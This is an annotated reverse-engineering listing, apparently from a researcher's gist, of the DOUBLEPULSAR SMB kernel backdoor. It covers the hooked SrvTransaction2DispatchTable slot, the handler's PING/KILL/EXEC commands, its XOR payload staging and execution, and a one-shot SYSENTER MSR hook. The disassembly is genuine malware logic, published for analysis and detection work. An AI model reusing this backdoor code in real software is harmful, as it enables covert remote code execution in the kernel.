DOUBLEPULSAR - ETERNALBLUE - SmbHandler()
Thanks to https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html#pulsar_step5 for the description
kd> dps srv!SrvTransaction2DispatchTable
91463530 9148b56f srv!SrvSmbOpen2
91463534 91485fe4 srv!SrvSmbFindFirst2
91463538 9148606d srv!SrvSmbFindNext2
9146353c 91488a89 srv!SrvSmbQueryFsInformation
91463540 914892f3 srv!SrvSmbSetFsInformation
91463544 9147ff65 srv!SrvSmbQueryPathInformation
91463548 91480c74 srv!SrvSmbSetPathInformation
9146354c 9147f77c srv!SrvSmbQueryFileInformation
91463550 9148055d srv!SrvSmbSetFileInformation
91463554 914894e5 srv!SrvSmbFindNotify
91463558 9148697a srv!SrvSmbIoctl2
9146355c 914894e5 srv!SrvSmbFindNotify
91463560 914894e5 srv!SrvSmbFindNotify
91463564 914815fb srv!SrvSmbCreateDirectory2
91463568 83f9f048 <==== the only slot that does not resolve to a srv! symbol: the hooked entry (handler listed below)
9146356c 9148bf2b srv!SrvTransactionNotImplemented
91463570 91472107 srv!SrvSmbGetDfsReferral
91463574 91471ff7 srv!SrvSmbReportDfsInconsistency
91463578 00000000
.rdata:0041ACF5 ; =============== S U B R O U T I N E =======================================
.rdata:0041ACF5
.rdata:0041ACF5
.rdata:0041ACF5 SmbDoublePulsarHandler proc near
.rdata:0041ACF5
.rdata:0041ACF5 ; Hook installed over one SrvTransaction2DispatchTable slot (the entry the
.rdata:0041ACF5 ; kd dump above marks with <====). Position independent: ebp is set to the
.rdata:0041ACF5 ; 4 KiB page holding this code, and the [ebp+xx] references below 48h
.rdata:0041ACF5 ; (where this routine appears to start, see KILL) are fields of that page's
.rdata:0041ACF5 ; header. Fields as used in this listing:
.rdata:0041ACF5 ;   [ebp+8]   two-argument callback that returns a buffer (NULL-tested)
.rdata:0041ACF5 ;   [ebp+0Ch] one-argument callback that releases it (see sub_41AE77);
.rdata:0041ACF5 ;             both are assumed stdcall - there is no caller-side esp fixup
.rdata:0041ACF5 ;   [ebp+10h] base of the hooked table: +3Ch is jumped to as the original
.rdata:0041ACF5 ;             handler and +38h is rewritten by EraseCode; consistent with the
.rdata:0041ACF5 ;             kd dump (hooked slot at +38h, SrvTransactionNotImplemented at
.rdata:0041ACF5 ;             +3Ch) - confirm
.rdata:0041ACF5 ;   [ebp+24h] 32-bit seed, echoed in the PING reply; [ebp+28h] = key that
.rdata:0041ACF5 ;             sub_41AE55 derives from it and that EXEC uses to decode payloads
.rdata:0041ACF5 ;   [ebp+2Ch]/[ebp+30h] staging buffer pointer / size
.rdata:0041ACF5 ;   [ebp+38h],[ebp+3Ch],[ebp+44h] set by sub_41AEE6/sub_41AE96, presumably
.rdata:0041ACF5 ;             into the SMB response/request - confirm against srv structures
.rdata:0041ACF5 ; Reply status byte (added to the 16-bit field at [[ebp+38h]+1Eh] in
.rdata:0041ACF5 ; CleanUp): 10h ok, 20h invalid request, 30h buffer allocation failed.
.rdata:0041ACF5 ; Every register except eax and flags is preserved and every path ends in
.rdata:0041ACF5 ; the original handler, so legitimate traffic on this slot keeps working.
.rdata:0041ACF5
.rdata:0041ACF5 var_4 = dword ptr -4
.rdata:0041ACF5 arg_4 = dword ptr 8
.rdata:0041ACF5
.rdata:0041ACF5 mov ecx, [esp+arg_4] ; ecx = second stack argument of the hooked handler
.rdata:0041ACF9 pusha ; 32-byte register save; the saved eax sits at [esp+1Ch]
.rdata:0041ACFA call $+5 ; push eip ...
.rdata:0041ACFF pop ebp ; ... ebp = 0041ACFF (own address)
.rdata:0041AD00 and bp, 0F000h ; clear the low 12 bits: ebp = base of the page holding this code
.rdata:0041AD05 mov [ebp+34h], ecx ; stash the argument (not read again in this listing)
.rdata:0041AD08 call sub_41AEE6 ; from ecx: sets [ebp+44h] and [ebp+38h]; keeps ecx/edx
.rdata:0041AD0D call sub_41AE55 ; [ebp+28h] = key derived from the seed [ebp+24h]
.rdata:0041AD12 call sub_41AE96 ; validate request markers; sets [ebp+3Ch]; eax = 1 on success
.rdata:0041AD17 test eax, eax
.rdata:0041AD19 jz loc_41AE02 ; not a backdoor request: pass through to the original handler
.rdata:0041AD1F mov ebx, [ebp+3Ch]
.rdata:0041AD22 mov ecx, [ebx-28h] ; 32-bit request field carrying the command
.rdata:0041AD25 call sub_41AE41 ; al = sum of its four bytes (mod 256)
.rdata:0041AD2A cmp al, 23h ; PING
.rdata:0041AD2C jz short CMD_PING
.rdata:0041AD2E cmp al, 77h ; KILL
.rdata:0041AD30 jz short CMD_KILL
.rdata:0041AD32 cmp al, 0C8h ; EXEC
.rdata:0041AD34 jz short CMD_EXEC
.rdata:0041AD36 jmp CMD_INVALID ; any other sum: status 20h
.rdata:0041AD3B ; ---------------------------------------------------------------------------
.rdata:0041AD3B
.rdata:0041AD3B CMD_PING: ; CODE XREF: SmbDoublePulsarHandler+37j
.rdata:0041AD3B mov ecx, [ebp+38h] ; response area
.rdata:0041AD3E mov eax, [ebp+24h]
.rdata:0041AD41 mov [ecx+0Eh], eax ; the reply carries the current seed at +0Eh, so it is visible in every PING reply
.rdata:0041AD44 xor eax, eax
.rdata:0041AD46 mov [ecx+12h], al ; byte at +12h := 0
.rdata:0041AD49 jmp PING ; status 10h
.rdata:0041AD4E ; ---------------------------------------------------------------------------
.rdata:0041AD4E
.rdata:0041AD4E CMD_KILL: ; CODE XREF: SmbDoublePulsarHandler+3Bj
.rdata:0041AD4E call EraseCode ; release the staging buffer and restore the dispatch slot
.rdata:0041AD53 jmp KILL ; then release the code page itself (see KILL)
.rdata:0041AD58 ; ---------------------------------------------------------------------------
.rdata:0041AD58
.rdata:0041AD58 CMD_EXEC: ; CODE XREF: SmbDoublePulsarHandler+3Fj
.rdata:0041AD58 mov ebx, [ebp+3Ch]
.rdata:0041AD5B mov eax, [ebx-18h] ; -> three key-XORed dwords describing this chunk
.rdata:0041AD5E mov esi, [eax]
.rdata:0041AD60 xor esi, [ebp+28h] ; esi = total payload size
.rdata:0041AD63 mov edi, [eax+8]
.rdata:0041AD66 xor edi, [ebp+28h] ; edi = offset of this chunk within the payload
.rdata:0041AD69 mov eax, [eax+4]
.rdata:0041AD6C xor eax, [ebp+28h] ; eax = length of this chunk
.rdata:0041AD6F cmp eax, [ebx+10h] ; must equal the length field at +10h
.rdata:0041AD72 mov ebx, eax ; ebx = chunk length (mov leaves the flags intact)
.rdata:0041AD74 jnz short CMD_INVALID
.rdata:0041AD76 mov ecx, [ebp+30h] ; current staging buffer size
.rdata:0041AD79 cmp ecx, esi
.rdata:0041AD7B mov eax, [ebp+2Ch] ; eax = current staging buffer
.rdata:0041AD7E jz short loc_41AD98 ; same total as before: reuse the buffer
.rdata:0041AD80 call sub_41AE77 ; otherwise wipe and release the old one ...
.rdata:0041AD85 lea eax, [esi+4]
.rdata:0041AD88 push eax
.rdata:0041AD89 push 0
.rdata:0041AD8B call dword ptr [ebp+8] ; ... and obtain total+4 bytes through the callback
.rdata:0041AD8E test eax, eax
.rdata:0041AD90 jz short loc_41ADF5 ; NULL: status 30h
.rdata:0041AD92 mov [ebp+2Ch], eax
.rdata:0041AD95 mov [ebp+30h], esi
.rdata:0041AD98
.rdata:0041AD98 loc_41AD98: ; CODE XREF: SmbDoublePulsarHandler+89j
.rdata:0041AD98 add edi, ebx
.rdata:0041AD9A cmp edi, esi
.rdata:0041AD9C ja short CMD_INVALID ; offset+length must not exceed the total (unsigned)
.rdata:0041AD9E sub edi, ebx
.rdata:0041ADA0 add edi, eax ; edi = buffer + offset
.rdata:0041ADA2 push edi ; remember the destination
.rdata:0041ADA3 mov edx, esi ; edx = total
.rdata:0041ADA5 mov esi, [ebp+3Ch]
.rdata:0041ADA8 mov esi, [esi-10h] ; esi = chunk bytes in the request
.rdata:0041ADAB mov ecx, ebx
.rdata:0041ADAD rep movsb ; copy the chunk into the buffer
.rdata:0041ADAF pop esi ; esi = destination start
.rdata:0041ADB0 mov ecx, ebx
.rdata:0041ADB2 shr ecx, 2 ; dword count (length rounded down to a multiple of 4)
.rdata:0041ADB5 mov ebx, [ebp+28h] ; ebx = key
.rdata:0041ADB8
.rdata:0041ADB8 loc_41ADB8: ; CODE XREF: SmbDoublePulsarHandler+C8j
.rdata:0041ADB8 xor [esi], ebx ; decode the chunk in place, one dword at a time
.rdata:0041ADBA add esi, 4
.rdata:0041ADBD loop loc_41ADB8
.rdata:0041ADBF add eax, edx ; eax = end of the buffer
.rdata:0041ADC1 cmp esi, eax
.rdata:0041ADC3 jl short PING ; chunk end below buffer end (signed): more to come, acknowledge with 10h only
.rdata:0041ADC5 mov eax, [ebp+2Ch] ; payload complete: run the staged buffer
.rdata:0041ADC8 pusha
.rdata:0041ADC9 mov esi, esp
.rdata:0041ADCB push eax ; the payload receives its own address as sole argument
.rdata:0041ADCC call eax
.rdata:0041ADCE mov esp, esi ; esp restored whatever the callee did with the stack
.rdata:0041ADD0 popa
.rdata:0041ADD1 call sub_41AE77 ; zero-fill and release the staging buffer
.rdata:0041ADD6 mov eax, [ebp+24h] ; re-seed: seed := (seed>>1) ^ dword at page offset ((seed>>1) & 0FFh)
.rdata:0041ADD9 shr eax, 1
.rdata:0041ADDB xor ecx, ecx
.rdata:0041ADDD mov cl, al
.rdata:0041ADDF add ecx, ebp
.rdata:0041ADE1 mov ecx, [ecx]
.rdata:0041ADE3 xor eax, ecx
.rdata:0041ADE5 mov [ebp+24h], eax
.rdata:0041ADE8 call sub_41AE55 ; ... and rederive the key: it changes after every completed EXEC
.rdata:0041ADED
.rdata:0041ADED PING: ; CODE XREF: SmbDoublePulsarHandler+54j
.rdata:0041ADED ; SmbDoublePulsarHandler+CEj
.rdata:0041ADED mov al, 10h ; status: ok
.rdata:0041ADEF jmp short CleanUp
.rdata:0041ADF1 ; ---------------------------------------------------------------------------
.rdata:0041ADF1
.rdata:0041ADF1 CMD_INVALID: ; CODE XREF: SmbDoublePulsarHandler+41j
.rdata:0041ADF1 ; SmbDoublePulsarHandler+7Fj ...
.rdata:0041ADF1 mov al, 20h ; status: invalid request
.rdata:0041ADF3 jmp short CleanUp
.rdata:0041ADF5 ; ---------------------------------------------------------------------------
.rdata:0041ADF5
.rdata:0041ADF5 loc_41ADF5: ; CODE XREF: SmbDoublePulsarHandler+9Bj
.rdata:0041ADF5 mov al, 30h ; status: buffer allocation failed
.rdata:0041ADF7 jmp short $+2 ; two-byte jump to the next instruction: falls into CleanUp
.rdata:0041ADF9 ; ---------------------------------------------------------------------------
.rdata:0041ADF9
.rdata:0041ADF9 CleanUp: ; CODE XREF: SmbDoublePulsarHandler+FAj
.rdata:0041ADF9 ; SmbDoublePulsarHandler+FEj ...
.rdata:0041ADF9 mov ecx, [ebp+38h]
.rdata:0041ADFC mov ah, 0 ; ax = status byte
.rdata:0041ADFE add [ecx+1Eh], ax ; added to the 16-bit field at +1Eh of the response area
.rdata:0041AE02
.rdata:0041AE02 loc_41AE02: ; CODE XREF: SmbDoublePulsarHandler+24j
.rdata:0041AE02 mov eax, [ebp+10h]
.rdata:0041AE05 mov [esp+20h+var_4], eax ; overwrite the saved-eax slot of the pusha frame ...
.rdata:0041AE09 popa ; ... so every register is as on entry except eax = [ebp+10h]
.rdata:0041AE0A jmp dword ptr [eax+3Ch] ; tail-jump to the original handler; the caller's stack is untouched
.rdata:0041AE0D ; ---------------------------------------------------------------------------
.rdata:0041AE0D
.rdata:0041AE0D KILL: ; CODE XREF: SmbDoublePulsarHandler+5Ej
.rdata:0041AE0D lea eax, [ebp+48h] ; presumably this routine's in-memory address (page offset 48h):
.rdata:0041AE0D ; 147h and 13Eh below are exactly the distances, from the start of this proc, of
.rdata:0041AE0D ; the immediate operands of the two "push 0" at 0041AE3B and 0041AE32
.rdata:0041AE10 mov ecx, [ebp+0Ch]
.rdata:0041AE13 mov [eax+147h], ecx ; patch: the push at 0041AE3B now pushes the release callback
.rdata:0041AE19 mov [eax+13Eh], ebp ; patch: the push at 0041AE32 now pushes the page base
.rdata:0041AE1F mov ax, 10h ; status: ok
.rdata:0041AE23 mov ecx, [ebp+38h]
.rdata:0041AE26 add [ecx+1Eh], ax
.rdata:0041AE2A mov eax, [ebp+10h] ; same frame fix-up as at loc_41AE02
.rdata:0041AE2D mov [esp+20h+var_4], eax
.rdata:0041AE31 popa
.rdata:0041AE32 push 0 ; (patched above) page base: argument for the release callback
.rdata:0041AE37 mov eax, [eax+3Ch]
.rdata:0041AE3A push eax ; original handler: return address for the release callback
.rdata:0041AE3B push 0 ; (patched above) release callback
.rdata:0041AE40 retn ; "returns" into the callback: it releases the page holding this code and then
.rdata:0041AE40 ; returns into the original handler with the caller's stack exactly as on entry
.rdata:0041AE40 ; (requires the callback to pop its own argument, i.e. stdcall). Self-erasing path.
.rdata:0041AE40 SmbDoublePulsarHandler endp
.rdata:0041AE40
.rdata:0041AE41
.rdata:0041AE41 ; =============== S U B R O U T I N E =======================================
.rdata:0041AE41
.rdata:0041AE41
.rdata:0041AE41 sub_41AE41 proc near ; CODE XREF: SmbDoublePulsarHandler+30p
.rdata:0041AE41 ; al = sum of the four bytes of ecx, mod 256; the upper bits of eax are
.rdata:0041AE41 ; cleared. The dispatcher compares the result with 23h/77h/0C8h, so many
.rdata:0041AE41 ; different 32-bit values select the same command. Clobbers eax, ecx, flags.
.rdata:0041AE41 xor eax, eax
.rdata:0041AE43 mov al, cl ; byte 0
.rdata:0041AE45 shr ecx, 8
.rdata:0041AE48 add al, cl ; + byte 1
.rdata:0041AE4A shr ecx, 8
.rdata:0041AE4D add al, cl ; + byte 2
.rdata:0041AE4F shr ecx, 8
.rdata:0041AE52 add al, cl ; + byte 3 (carry discarded)
.rdata:0041AE54 retn
.rdata:0041AE54 sub_41AE41 endp
.rdata:0041AE54
.rdata:0041AE55
.rdata:0041AE55 ; =============== S U B R O U T I N E =======================================
.rdata:0041AE55
.rdata:0041AE55
.rdata:0041AE55 sub_41AE55 proc near ; CODE XREF: SmbDoublePulsarHandler+18p
.rdata:0041AE55 ; SmbDoublePulsarHandler+F3p
.rdata:0041AE55 ; Key schedule: [ebp+28h] = (seed << 1) ^ bswap(seed), seed = [ebp+24h].
.rdata:0041AE55 ; A pure function of the seed, which CMD_PING writes into the reply, so the
.rdata:0041AE55 ; key is derivable from observed traffic. Clobbers eax, flags; keeps ecx.
.rdata:0041AE55 push ecx
.rdata:0041AE56 mov eax, [ebp+24h]
.rdata:0041AE59 mov ecx, eax
.rdata:0041AE5B bswap ecx ; byte-reversed seed
.rdata:0041AE5D shl eax, 1
.rdata:0041AE5F xor eax, ecx
.rdata:0041AE61 mov [ebp+28h], eax
.rdata:0041AE64 pop ecx
.rdata:0041AE65 retn
.rdata:0041AE65 sub_41AE55 endp
.rdata:0041AE65
.rdata:0041AE66
.rdata:0041AE66 ; =============== S U B R O U T I N E =======================================
.rdata:0041AE66
.rdata:0041AE66
.rdata:0041AE66 EraseCode proc near ; CODE XREF: SmbDoublePulsarHandler:CMD_KILLp
.rdata:0041AE66 ; Unhook: wipe and release the staging buffer, then copy the dword at
.rdata:0041AE66 ; [[ebp+10h]+3Ch] over [[ebp+10h]+38h]. Consistent with the kd dump above
.rdata:0041AE66 ; if [ebp+10h] is SrvTransaction2DispatchTable: +38h is the hooked slot,
.rdata:0041AE66 ; +3Ch is SrvTransactionNotImplemented, presumably what the slot held
.rdata:0041AE66 ; before hooking - confirm. Preserves all registers.
.rdata:0041AE66 pusha
.rdata:0041AE67 call sub_41AE77
.rdata:0041AE6C mov eax, [ebp+10h]
.rdata:0041AE6F mov ecx, [eax+3Ch]
.rdata:0041AE72 mov [eax+38h], ecx ; put the original target back into the table slot
.rdata:0041AE75 popa
.rdata:0041AE76 retn
.rdata:0041AE76 EraseCode endp
.rdata:0041AE76
.rdata:0041AE77
.rdata:0041AE77 ; =============== S U B R O U T I N E =======================================
.rdata:0041AE77
.rdata:0041AE77
.rdata:0041AE77 sub_41AE77 proc near ; CODE XREF: SmbDoublePulsarHandler+8Bp
.rdata:0041AE77 ; SmbDoublePulsarHandler+DCp ...
.rdata:0041AE77 ; Release the staging buffer: if [ebp+2Ch] is non-NULL, zero-fill its
.rdata:0041AE77 ; [ebp+30h] bytes (no payload remnants are left in freed memory) and hand
.rdata:0041AE77 ; it to the one-argument callback at [ebp+0Ch]; then clear both fields.
.rdata:0041AE77 ; Preserves all registers. The pusha/popa pair only balances if the
.rdata:0041AE77 ; callback pops its own argument (stdcall) - assumed, not shown here.
.rdata:0041AE77 pusha
.rdata:0041AE78 mov ebx, [ebp+2Ch]
.rdata:0041AE7B test ebx, ebx
.rdata:0041AE7D jz short loc_41AE8C ; nothing allocated
.rdata:0041AE7F xor eax, eax
.rdata:0041AE81 mov edi, ebx
.rdata:0041AE83 mov ecx, [ebp+30h]
.rdata:0041AE86 rep stosb ; wipe the buffer
.rdata:0041AE88 push ebx
.rdata:0041AE89 call dword ptr [ebp+0Ch] ; release(buffer)
.rdata:0041AE8C
.rdata:0041AE8C loc_41AE8C: ; CODE XREF: sub_41AE77+6j
.rdata:0041AE8C xor eax, eax
.rdata:0041AE8E mov [ebp+30h], eax ; size := 0
.rdata:0041AE91 mov [ebp+2Ch], eax ; pointer := NULL
.rdata:0041AE94 popa
.rdata:0041AE95 retn
.rdata:0041AE95 sub_41AE77 endp
.rdata:0041AE95
.rdata:0041AE96
.rdata:0041AE96 ; =============== S U B R O U T I N E =======================================
.rdata:0041AE96
.rdata:0041AE96
.rdata:0041AE96 sub_41AE96 proc near ; CODE XREF: SmbDoublePulsarHandler+1Dp
.rdata:0041AE96 ; Request validation. Reads the dword at [ebp+44h] (then the one 8 bytes
.rdata:0041AE96 ; further) and accepts the first whose sign bit is set (sub_41AEDE) -
.rdata:0041AE96 ; presumably a "looks like a kernel-space pointer" test, confirm. The
.rdata:0041AE96 ; accepted value replaces [ebp+44h]; it must hold two consecutive dwords
.rdata:0041AE96 ; equal to 0Ch at +54h (or +58h), and [ebp+3Ch] is set to the first of
.rdata:0041AE96 ; them - the base used by the [ebx-28h]/[ebx-18h]/[ebx+10h]/[esi-10h]
.rdata:0041AE96 ; reads in the dispatcher. Returns eax = 1 if accepted, else 0.
.rdata:0041AE96 ; ecx is clobbered; edi, edx, esi are saved and restored.
.rdata:0041AE96 push edi
.rdata:0041AE97 push edx
.rdata:0041AE98 push esi
.rdata:0041AE99 mov edi, ecx ; stored but never read again
.rdata:0041AE9B mov edx, [ebp+44h]
.rdata:0041AE9E mov ecx, [edx] ; first candidate
.rdata:0041AEA0 call sub_41AEDE
.rdata:0041AEA5 test eax, eax
.rdata:0041AEA7 jnz short loc_41AEB7
.rdata:0041AEA9 add edx, 8
.rdata:0041AEAC mov ecx, [edx] ; second candidate, two dwords further
.rdata:0041AEAE call sub_41AEDE
.rdata:0041AEB3 test eax, eax
.rdata:0041AEB5 jz short loc_41AED8 ; neither qualifies
.rdata:0041AEB7
.rdata:0041AEB7 loc_41AEB7: ; CODE XREF: sub_41AE96+11j
.rdata:0041AEB7 mov [ebp+44h], ecx ; remember the accepted pointer
.rdata:0041AEBA push 0Ch ; eax = 0Ch (3-byte form of mov eax, 0Ch)
.rdata:0041AEBC pop eax
.rdata:0041AEBD lea esi, [ecx+54h]
.rdata:0041AEC0 cmp eax, [esi]
.rdata:0041AEC2 jz short loc_41AECB
.rdata:0041AEC4 add esi, 4 ; try one dword later
.rdata:0041AEC7 cmp eax, [esi]
.rdata:0041AEC9 jnz short loc_41AED8
.rdata:0041AECB
.rdata:0041AECB loc_41AECB: ; CODE XREF: sub_41AE96+2Cj
.rdata:0041AECB cmp eax, [esi+4] ; the following dword must be 0Ch as well
.rdata:0041AECE jnz short loc_41AED8
.rdata:0041AED0 mov [ebp+3Ch], esi
.rdata:0041AED3 xor eax, eax
.rdata:0041AED5 inc eax ; accepted
.rdata:0041AED6 jmp short loc_41AEDA
.rdata:0041AED8 ; ---------------------------------------------------------------------------
.rdata:0041AED8
.rdata:0041AED8 loc_41AED8: ; CODE XREF: sub_41AE96+1Fj
.rdata:0041AED8 ; sub_41AE96+33j ...
.rdata:0041AED8 xor eax, eax ; rejected
.rdata:0041AEDA
.rdata:0041AEDA loc_41AEDA: ; CODE XREF: sub_41AE96+40j
.rdata:0041AEDA pop esi
.rdata:0041AEDB pop edx
.rdata:0041AEDC pop edi
.rdata:0041AEDD retn
.rdata:0041AEDD sub_41AE96 endp
.rdata:0041AEDD
.rdata:0041AEDE
.rdata:0041AEDE ; =============== S U B R O U T I N E =======================================
.rdata:0041AEDE
.rdata:0041AEDE
.rdata:0041AEDE sub_41AEDE proc near ; CODE XREF: sub_41AE96+Ap
.rdata:0041AEDE ; sub_41AE96+18p
.rdata:0041AEDE ; eax = 1 if ecx is negative as a signed 32-bit value (bit 31 set), else 0.
.rdata:0041AEDE ; Acceptance test for the candidate pointers examined by sub_41AE96.
.rdata:0041AEDE xor eax, eax
.rdata:0041AEE0 cmp ecx, eax
.rdata:0041AEE2 jge short locret_41AEE5 ; signed compare against 0
.rdata:0041AEE4 inc eax
.rdata:0041AEE5
.rdata:0041AEE5 locret_41AEE5: ; CODE XREF: sub_41AEDE+4j
.rdata:0041AEE5 retn
.rdata:0041AEE5 sub_41AEDE endp
.rdata:0041AEE5
.rdata:0041AEE6
.rdata:0041AEE6 ; =============== S U B R O U T I N E =======================================
.rdata:0041AEE6
.rdata:0041AEE6
.rdata:0041AEE6 sub_41AEE6 proc near ; CODE XREF: SmbDoublePulsarHandler+13p
.rdata:0041AEE6 ; Locate the bookkeeping pointers from the argument in ecx: scan dwords
.rdata:0041AEE6 ; upward from ecx until one equals ecx + word[ecx+2], then
.rdata:0041AEE6 ;   [ebp+44h] = (match + 1Ch) rounded up to a multiple of 8
.rdata:0041AEE6 ;   [ebp+38h] = dword at [match - 8]  (used as the response area later)
.rdata:0041AEE6 ; The scan has no upper bound: without a match it never terminates on its
.rdata:0041AEE6 ; own. Clobbers eax, flags; ecx and edx are restored on exit.
.rdata:0041AEE6 push edx
.rdata:0041AEE7 push ecx
.rdata:0041AEE8 xor edx, edx
.rdata:0041AEEA mov dx, [ecx+2] ; 16-bit field at ecx+2
.rdata:0041AEEE add edx, ecx ; edx = ecx + that field: the value searched for
.rdata:0041AEF0
.rdata:0041AEF0 loc_41AEF0: ; CODE XREF: sub_41AEE6+11j
.rdata:0041AEF0 cmp edx, [ecx]
.rdata:0041AEF2 jz short loc_41AEF9
.rdata:0041AEF4 add ecx, 4
.rdata:0041AEF7 jmp short loc_41AEF0
.rdata:0041AEF9 ; ---------------------------------------------------------------------------
.rdata:0041AEF9
.rdata:0041AEF9 loc_41AEF9: ; CODE XREF: sub_41AEE6+Cj
.rdata:0041AEF9 pop edx ; edx = the caller's ecx (pushed second, popped first)
.rdata:0041AEFA lea eax, [ecx+1Ch]
.rdata:0041AEFD add eax, 7
.rdata:0041AF00 and al, 0F8h ; align up to 8 (only the low byte needs masking)
.rdata:0041AF02 mov [ebp+44h], eax
.rdata:0041AF05 mov eax, [ecx-8]
.rdata:0041AF08 mov [ebp+38h], eax
.rdata:0041AF0B mov ecx, edx ; restore the caller's ecx
.rdata:0041AF0D pop edx ; restore the caller's edx
.rdata:0041AF0E retn
.rdata:0041AF0E sub_41AEE6 endp
.rdata:0041AF0E

msuiche commented Apr 23, 2017

.data:0041EDE8 kernelHandler:                          ; DATA XREF: AddKernelHandlers+20E↑o
.data:0041EDE8                                         ; Entry of the kernel-mode stage. Decides the CPU
.data:0041EDE8                                         ; mode first: "inc eax" is the single byte 40h, which
.data:0041EDE8                                         ; x86-64 decodes as a REX prefix on the following nop,
.data:0041EDE8                                         ; so only in 64-bit mode does eax stay 0 and the ZF
.data:0041EDE8                                         ; set by the xor survive to the jz.
.data:0041EDE8                 xor     eax, eax
.data:0041EDEA                 inc     eax             ; 40h: a real increment in 32-bit mode only
.data:0041EDEB                 nop
.data:0041EDEC                 jz      short _Is64Bits
.data:0041EDEE                 call    _continue_32bits ; 32-bit: arm the SYSENTER hook (below)
.data:0041EDF3                 retn    24h             ; back to whoever invoked it, discarding 24h bytes of arguments
.data:0041EDF6 ; ---------------------------------------------------------------------------
.data:0041EDF6
.data:0041EDF6 _Is64Bits:                              ; CODE XREF: .data:0041EDEC↑j
.data:0041EDF6                 call    loc_41EEA2      ; 64-bit path; target outside this listing
.data:0041EDFB                 retn
.data:0041EDFC
.data:0041EDFC ; =============== S U B R O U T I N E =======================================
.data:0041EDFC
.data:0041EDFC
.data:0041EDFC _continue_32bits proc near              ; CODE XREF: .data:0041EDEE↑p
.data:0041EDFC                                         ; Re-points IA32_SYSENTER_EIP at Sysenter_EIP and
.data:0041EDFC                                         ; stashes the original value at a fixed address.
.data:0041EDFC                                         ; Clobbers eax, ebx, ecx, edx.
.data:0041EDFC                 call    GetEip          ; pushes 0041EE01; GetEip pops it as its base address
.data:0041EDFC ; ---------------------------------------------------------------------------
.data:0041EE01                 db 0EBh                 ; never executed: the return address pointing here is consumed by "pop ebx"
.data:0041EE02 ; ---------------------------------------------------------------------------
.data:0041EE02
.data:0041EE02 GetEip:                                 ; CODE XREF: _continue_32bits↑j
.data:0041EE02                 nop
.data:0041EE03                 pop     ebx             ; ebx = 0041EE01 (position-independent base)
.data:0041EE04                 mov     ecx, 176h       ; IA32_SYSENTER_EIP
.data:0041EE09                 rdmsr                   ; eax = current SYSENTER_EIP (edx = high half, unused)
.data:0041EE0B                 mov     ds:0FFDFFFFCh, eax ; keep it at a fixed kernel address (presumably a spare dword in a well-known page - confirm); Sysenter_EIP reads it back
.data:0041EE10                 lea     eax, [ebx+17h]  ; Sysenter_EIP() = 0041EE18
.data:0041EE13                 xor     edx, edx
.data:0041EE15                 wrmsr                   ; the next user-mode sysenter lands in Sysenter_EIP
.data:0041EE17                 retn                    ; pops the return address of "call _continue_32bits" (0041EDF3)
.data:0041EE17 _continue_32bits endp ; sp-analysis failed
.data:0041EE17
.data:0041EE18
.data:0041EE18 ; =============== S U B R O U T I N E =======================================
.data:0041EE18
.data:0041EE18
.data:0041EE18 Sysenter_EIP    proc near
.data:0041EE18
.data:0041EE18 ; Single-shot SYSENTER handler. Entered in ring 0 on the first user-mode
.data:0041EE18 ; sysenter after _continue_32bits re-pointed IA32_SYSENTER_EIP here, with
.data:0041EE18 ; segment registers and stack still as sysenter left them. It loads kernel
.data:0041EE18 ; data selectors, switches to the ring-0 stack, builds a frame by hand,
.data:0041EE18 ; restores the original MSR value (so this runs exactly once), enables
.data:0041EE18 ; interrupts and calls loc_41EE9D (the actual work, outside this listing),
.data:0041EE18 ; then unwinds and continues into the original SYSENTER handler so the
.data:0041EE18 ; interrupted system call completes normally.
.data:0041EE18 ; The meaning of fs:40h, fs:1Ch, [ebx+124h], [esi+28h], 0FFDF0304h and of
.data:0041EE18 ; the selector values is not established by this listing - presumably
.data:0041EE18 ; KPCR / thread / shared-page fields; confirm against symbols.
.data:0041EE18
.data:0041EE18 var_33          = byte ptr -33h
.data:0041EE18
.data:0041EE18                 mov     ecx, 23h
.data:0041EE1D                 push    30h
.data:0041EE1F                 pop     fs              ; fs = 30h, ds = es = 23h
.data:0041EE21                 mov     ds, ecx
.data:0041EE23                 mov     es, ecx
.data:0041EE25                 mov     ecx, large fs:40h
.data:0041EE2C                 mov     esp, [ecx+4]    ; switch to the ring-0 stack located via fs:40h
.data:0041EE2F                 push    dword ptr ds:0FFDFFFFCh ; original SYSENTER_EIP saved by GetEip; the final retn returns into it
.data:0041EE35                 pusha                   ; register image restored by popa at 0041EE9B
.data:0041EE36                 pushf
.data:0041EE37                 push    23h             ; from here to 0041EE63 the pushes look like a hand-built
.data:0041EE39                 push    edx             ; trap frame (ss, esp, eflags, cs, eip, error code, ebp/ebx/
.data:0041EE3A                 pushf                   ; esi/edi, fs, exception list) - confirm against KTRAP_FRAME
.data:0041EE3B                 push    2
.data:0041EE3D                 add     edx, 8
.data:0041EE40                 popf                    ; live eflags = 2 (IF clear)
.data:0041EE41                 or      [esp+34h+var_33], 2 ; set bit 9 (IF) in the eflags image pushed at 0041EE3A
.data:0041EE46                 push    1Bh
.data:0041EE48                 push    dword ptr ds:0FFDF0304h ; value read from a fixed address (see header note)
.data:0041EE4E                 push    0
.data:0041EE50                 push    ebp
.data:0041EE51                 push    ebx
.data:0041EE52                 push    esi
.data:0041EE53                 push    edi
.data:0041EE54                 mov     ebx, large fs:1Ch
.data:0041EE5B                 push    3Bh
.data:0041EE5D                 mov     esi, [ebx+124h]
.data:0041EE63                 push    dword ptr [ebx] ; save the dword at [ebx] ...
.data:0041EE65                 xor     eax, eax
.data:0041EE67                 dec     eax
.data:0041EE68                 mov     [ebx], eax      ; ... and set it to -1 (presumably an exception-list terminator)
.data:0041EE6A                 mov     ebp, [esi+28h]
.data:0041EE6D                 push    1
.data:0041EE6F                 sub     esp, 48h        ; reserve 48h bytes
.data:0041EE72                 sub     ebp, 29Ch       ; ebp = [esi+28h] - 29Ch
.data:0041EE78                 mov     eax, ds:0FFDFFFFCh
.data:0041EE7D                 mov     ecx, 176h       ; IA32_SYSENTER_EIP
.data:0041EE82                 xor     edx, edx
.data:0041EE84                 wrmsr                   ; restore the original target: the hook fires only once
.data:0041EE86                 sti
.data:0041EE87                 call    loc_41EE9D      ; the real work, outside this listing
.data:0041EE8C                 cli
.data:0041EE8D                 mov     ecx, large fs:40h
.data:0041EE94                 mov     esp, [ecx+4]    ; back to the top of the ring-0 stack ...
.data:0041EE97                 sub     esp, 28h        ; ... minus 4 + 20h + 4: exactly the pushf at 0041EE36 (assumes [fs:40h]+4 is unchanged)
.data:0041EE9A                 popf
.data:0041EE9B                 popa                    ; registers as at 0041EE35 (edx too: its image predates the add)
